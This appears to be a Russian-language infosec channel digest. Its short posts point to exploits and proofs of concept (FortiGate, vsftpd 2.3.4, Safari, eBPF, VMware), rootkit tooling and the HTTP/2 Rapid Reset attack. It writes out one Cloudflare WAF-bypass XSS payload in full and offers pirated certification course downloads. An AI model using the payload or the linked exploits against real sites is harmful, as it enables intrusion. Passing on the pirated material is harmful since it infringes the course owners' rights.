CVE-2023-27997 FortiGate
Разбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPN
Скачать - exploit
Дырке 3 месяца - сколько успело проПатчиться расскажет shodan

#fortigate #rce

АНБ (National Security Agency, NSA) не спит ! И мы не будем.
Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли.
Сегодня выкатили репозиторий ELITEWOLF.
В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.
Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.

update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть )))

#NSA

OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12,
CCC , CKLP, Cisco CCNA 200-125 и еще тонна всего
скачать ((((
если вы любитель испанского

#soclose

macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.

Криво пропатчили cve-2023-33297
Получился bitcoin botnet ddos attack
Видео + описание

#btc

CVE-2023-41993
POC
#Safari #iOS #iPadOS #macOS

vsftpd (для версии 2.3.4)
usage:
python3 vsftpd_exploit.py <IP address> <port> <command>

Палестино-израильский конфликт
Действующие лица через призму мира хакеров и инфосека
Списки

#again2012

Ну только если в майку встроены наручники и трансфер до США ))))

Windows Exploit Protection Settings (powerSHELL))
link
Так, стоп, погодите...)))

CVE-2023-44487
уязвимость в протоколе HTTP/2
Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etc
Пик атаки составлял 389 000 000 (да да) запросов в секунду.
Ну и конечно же все это уплыло ))))
Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.

link 1
link 2
link 3
link 4
link 5
what the fuck notes

#DoS #HA

CVE-2023-2163
Linux Kernel: eBPF verifier bug
POC

Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))
https://ransomware.live/#/status

or winamp 😜
#humor

Windows rootkit development for red teaming
*
Part 1 | Introduction
Part 2 | A tale of routines, IOCTLs and IRPs
Part 3 | Sailing to the land of the user (and debugging the ship)
Part 4 | The call back home
Part 5 | Saruman's Manipulation


*
#malware #windows #rootkit

Cloudflare bypass WAF
*
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;

#cloudflare #bypass #waf #xss

CVE-2023-34051
VMware Aria Operations for Logs
*
Technical Deep
*
Exploit


#vmware #bypass #exploit

Каждый раз смешно )))
И мало того, оно даже документировано - Windows Internals part 2

#remoteRegistry #135

So cool ! ))))
link

#Назад_в_будущее